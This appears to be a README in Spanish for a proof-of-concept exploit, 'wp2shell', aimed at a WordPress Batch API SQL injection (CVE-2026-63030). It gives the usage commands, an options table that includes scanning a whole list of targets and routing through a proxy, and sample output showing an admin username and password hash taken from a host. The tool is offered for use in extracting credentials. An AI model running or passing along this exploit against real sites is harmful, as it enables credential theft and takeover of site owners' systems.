
POC de CVE-2026-63030 (wp2shell).
Exploit de inyección SQL por desincronización de la API Batch de WordPress
Herramienta de prueba de concepto para extraer usuarios y hashes de contraseñas mediante la vulnerabilidad CVE-2026-63030 (wp2shell).
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
| Argumento | Descripción | Predeterminado |
|---|---|---|
target | URL de un único objetivo | - |
-l, --list | Archivo con lista de objetivos (uno por línea) | - |
--prefix | Prefijo de tabla de base de datos | wp_ |
--rest-route | Usar ?rest_route= | Deshabilitado |
--timeout | Tiempo de espera de solicitud (segundos) | 30 |
--proxy | Proxy HTTP (compatible con Burp/ZAP) | Ninguno |
--max-len | Longitud máxima de extracción | 255 |
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553